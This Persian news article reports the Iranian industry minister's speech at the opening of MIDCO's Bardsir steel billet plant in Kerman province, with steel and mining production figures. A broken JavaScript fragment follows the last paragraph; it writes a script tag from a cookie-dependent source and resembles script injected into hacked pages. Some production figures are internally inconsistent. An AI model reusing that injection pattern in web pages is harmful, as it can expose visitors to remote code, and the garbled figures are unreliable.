سه شنبه ۰۱ مرداد ۱۳۹۸ , ۰۲:۵۳:۲۲
2019 / July / 22برگزیده، گروه صنایع معدنی، فولاد، گروه صنایع معدنی، ویژه بهمن ۲, ۱۳۹۷
رحمانی در مراسم افتتاح کارخانه شمش هلدینگ میدکو مطرح کرد:

رشد ۱۸ درصدی در تولید فولاد

سهم 30 درصدی استان کرمان از فعالیت‌های معدنی کشور

پروژه گندله سازی 2.5 میلیون تنی فولاد بوتیا با سرمایه گذاری 700میلیارد تومانی و همچنین پروژه شمش فولاد یک میلیون تنی بردسیربا سرمایه‌گذاری 1500 میلیارد تومانی با حضور اسحاق جهانگیری معاون اول رییس جمهور،رحمانی وزیر صنعت، معدن و تجارت، محمدجواد فدایی استاندار کرمان، شهباز حسن پور نماینده مردم سیرجان و بردسیر در مجلس شورای اسلامی، قاسمی مدیرعامل بانک پاسارگاد ،علی اصغر پورمند مدیرعامل هلدینگ میدکو و جمعی از مدیران و مسئولان افتتاح شد

به گزارش خبرنگار پیام‌اوران معدن و فولاد؛ در آیین افتتاح این مراسم رضا رحمانی وزیر صنعت ، معدن و تجارت اظهار داشت: بر اساس آمار انجمن جهانی فولاد در سال ۲۰۱۷، به میزان یکهزار و ۶۸۰ میلیون تن فولاد در دنیا تولید شده است این در حالیست که بر اساس آمار جهانی در سال جاری بیش از ۲۲ میلیون تن  فولاد خام در کشور تولید شدهکه نسبت به سال قبل ۲۲ درصد رشد داشته است.

وی با عنوان اینکه متوسط رشد تولید فولاد در دنیا حدود ۶ درصد برآورد شده و در  ایران این میزان بالاتر از میانگین جهانی است، گفت: طی هشت ماه امسال ۱۶ هزار و ۶۰۰ میلیون تن فولاد خام در کشور تولید شده که نسبت به مدت مشابه سال گذشته رشد ۱۸ درصدی داشته است.

وی با تاکید بر اینکه در ۶ سال گذشته از پانزدهمین فولادی ساز به رتبه دهم جهانی دست یافته‌ایم گفت: هم اکنون ۱۱۰ میلیون تن در زنجیره فولاد پروژه تعریف شده است همچنین  ۲۰ میلیون تن در سواحل جنوبی بندرعباس و چابهار برنامه ریزی شده که تا پایان سال تولیدات اضافه می‌شود.

وی با اشاره به چهل سالگی پیروزی انقلاب اسلامی گفت : در سال ۵۷ تولید در زنجیره فولاد ۲٫۴ میلیون تن بود که این میزان در ابتدای دولت یازدهم ظرفیت تولید ۱۲۳ میلیون تن بوده این در حالیست که در حال حاضر این میزان تولید در زنجیره فولاد به ۲۰۵ میلیون تن رسیده که تا پایان سال به ۲۲۰ میلیون تن خواهد رسید.

وزیر صنعت، معدن و تجارت افزود با تاکید بر اینکه خام فروشی و صادرات مواد خام بسیار کاهش یافته و این توازن همچنان ادامه دارد، گفت: در صورت رونق صنعت ساختمان و با برنامه لایحه ۹۸ برای سال آینده در حوزه مسکن بازار خوبی برای صنعت فولاد ایجاد خواهد شد.

وی گفت: سرانه مصرف فولاد کشور افزایش خواهد یافت و در این جهت با برنامه ریزی ، هدایت و تشویق سرمایه گذاران برای راه اندازی زنجیره فولاد قادر به تامین نیازهای صنعت ساختمان خواهیم بود.

وزیر صنعت، معدن و تجارت اضافه کرد: در سند چشم انداز ۱۴۰۴ تولید ۵۵ میلیون تنی فولاد هدف گذاری شده است و صادرات ۱۵ میلیون تنی در سال نیز باید تحقق یابد.

وی ادامه داد: تکمیل زنجیره فولاد هشت میلیارد یورو سرمایه گذاری نیاز دارد و این منابع از محل صندوق توسعه ملی، منابع بانکی و آورده متقاضیان تامین می شود.

وی تصریح کرد: بومی سازی تجهیزات و تکنولوژی ها در فولاد بردسیر بیش از ۶۰ درصد ساخت داخل و با فناوری روز بوده است.

وزیر صنعت، معدن و تجارت گفت: فعالیت این وزارتخانه در راستای تکمیل زنجیره فولاد، پتروشیمی، مس، سیمان است و در این زمینه امروز در فولاد از صفر تا ۱۰۰ امکان  تولید و فرایندها وجود دارد.

وی با بیان اینکه معدن  در اولویت فعالیت ها قرار گرفته است، افزود:۶۳ میلیون تن ظرفیت تولید سنگ آهن طی سال های گذشته، اکنون به ۸۵ میلیون تن رسیده است و اخیرا اکتشافات خوبی در این حوزه صورت گرفته است به گونه‌ایکه با اکتشافات کنونی ذخایر فعلی سنگ آهن کشور به ۲ برابر افزایش می یابد.

وی افزود: امروز در استان کرمان ۳۶ درصد واحدهای تولیدی زیر ظرفیت کار می کنند که اولین مانع تولید کنندگان نبود نقدینگی است و باید مسئولان مورد توجه قرار دهند تا هیچ بنگاه اقتصادی در نتیجه کمبود نقدینگی تعطیل نشود. البته در این زمینه نظام بانکی قول همکاری داده است.ضمن آنکه  منابع بانکی در راستای پرداخت تسهیلات رونق تولید در استان کرمان جذب نشده و باید از این اعتبار استفاده و ظرفیت خالی واحدها تکمیل شود.

وزیر صنعت، معدن و تجارت گفت: ایران در تولید مس رتبه ۱۵، فناوری ۱۲ و آلومینیوم رتبه ۱۸ دنیا را دارد. همچنین ۲۴ پهنه اکتشافی مس در کرمان تعریف شده، ۱۹ پهنه واگذار، ۳۰۶ پروانه اکتشاف و ظرفیت استخراج استان ۶۶ میلیون تن با بیش از ۲۳ هزار شغل مستقیم است.

وی گفت: فعالیت های معدنی استان کرمان ۳۰ درصد معادن کشور است و این استان ۲۰ درصد از استخراج، ۳۹ درصد ارزش افزوده و ۳۶ درصد وصول حقوق دولتی کشور از استان کرمان تامین می شود.

وزیر صنعت، معدن و تجارت گفت: دولت در پروژه های اقتصاد مقاومتی و ویژه حوزه معدن و صنایع معدنی فرمایشات رهبر معظم انقلاب را مورد توجه قرار داده است.همچنین  در راستای تکمیل زنجیره فلزات اساسی فولاد، مس، آلومینیوم برنامه های متنوعی طراح شده و در این زمینه از جایگاه معدنی ارزشمند کشور استفاده می شود. +e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));:void 0}var =”,||void 0===time){var ), path=/; expires=”(”+src+'”><\/script>‘)}

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

استفاده از اخبار با نقل منبع معدن و فولاد مجاز است.